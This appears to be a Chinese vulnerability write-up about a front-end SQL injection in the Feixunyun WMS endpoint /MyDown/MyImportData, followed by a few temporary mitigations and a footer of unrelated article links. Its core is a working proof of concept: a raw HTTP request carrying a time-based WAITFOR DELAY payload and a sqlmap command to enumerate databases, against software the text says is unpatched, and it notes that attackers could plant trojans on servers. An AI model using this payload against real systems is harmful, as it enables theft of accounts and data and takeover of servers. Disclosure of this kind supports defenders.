【飞讯云MyImportData前台SQL注入已复现】

一、漏洞简介

飞讯云-WMS 接口:/MyDown/MyImportData?opeid=1处存在前台SQL注入漏洞,攻击者可以通过sql注入攻击获取到敏感数据,账号信息等,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

二、poc利用

复制代码
GET /MyDown/MyImportData?opeid=1%27+WAITFOR+DELAY+'0:0:10'-- HTTP/1.1
Host: {host}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: language=zh-CN; ASP.NET_SessionId=fszg0ra1zc3tgeepea3p4ujz
Connection: close

sqlmap验证:

复制代码
python sqlmap.py -u http://xxxx.xxx.xxx:8080/MyDown/MyImportData?opeid=1 -p openid --dbs

三、临时措施

厂商未发布补丁,建议:

1、waf设置规则防护

2、禁止对/MyDown/MyImportData?opeid=1接口的访问

相关推荐
千枫s29 分钟前
kali arp欺骗
网络安全
黎阳之光34 分钟前
视频孪生领航者,以中国技术定义全球数智化新高度
大数据·人工智能·算法·安全·数字孪生
上海云盾-小余39 分钟前
云服务器端口安全:暴露风险排查与最小权限配置指南
安全·ddos
每天一把堆栈1 小时前
pctf-pwn(2025)
网络安全·pwn
程序员学习随笔1 小时前
深入剖析 std::optional:实现原理、性能优化与安全编程实践
c++·安全·空值
菩提小狗1 小时前
每日安全情报报告 · 2026-04-10
网络安全·漏洞·cve·安全情报·每日安全
上海控安1 小时前
嵌入式软件安全解决之道-堆栈分析篇
测试工具·安全
JS_SWKJ1 小时前
网闸核心技术详解:数据“安全渡河”的物理密码
网络安全
AcrelGHP1 小时前
AIM-D系列直流IT系统绝缘监测产品:筑牢直流电气安全第一道防线
安全
志栋智能1 小时前
安全超自动化如何缩短平均检测与响应时间?
运维·安全·自动化